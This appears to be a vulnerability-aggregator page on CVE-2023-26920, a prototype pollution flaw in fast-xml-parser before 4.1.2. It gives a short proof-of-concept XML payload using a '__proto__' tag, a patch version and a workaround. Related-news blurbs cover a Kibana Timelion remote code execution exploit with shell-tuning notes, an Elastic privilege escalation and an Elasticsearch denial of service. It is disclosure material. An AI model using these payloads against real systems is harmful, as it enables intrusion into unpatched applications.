Headline
CVE-2023-26920: report.md
fast-xml-parser before 4.1.2 allows proto for Prototype Pollution.
Taking an example code from the github repo to demonstrate the bug:
const { XMLParser, XMLBuilder, XMLValidator} = require(“fast-xml-parser”);
let XMLdata = “<__proto__><polluted>hacked</polluted></__proto__>”
const parser = new XMLParser(); let jObj = parser.parse(XMLdata);
console.log(jObj.polluted) // should return hacked
In the above screenshot you can see the jObj was polluted with a new property.
jObj >{} jObj.__proto__ >{polluted: ‘hacked’} jObj.__proto__.polluted >’hacked’
More information on prototype pollution can be found here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
As it is common for developers to pass user controllable input to XMLParser , this can to do unexpected results. By chaining it with some prototype pollution gadget it might even can lead to RCE in some cases https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
Related news
Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This leads to an arbitrary command execution with permissions of the Kibana process on the host system. Exploitation will require a service or system reboot to restore normal operation. The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a docker image caused 6 shells.
### Impact As a part of this vulnerability, user was able to se code using `__proto__` as a tag or attribute name. ```js const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser"); let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>" const parser = new XMLParser(); let jObj = parser.parse(XMLdata); console.log(jObj.polluted) // should return hacked ``` ### Patches The problem has been patched in v4.1.2 ### Workarounds User can check for "__proto__" in the XML string before parsing it to the parser. ### References https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.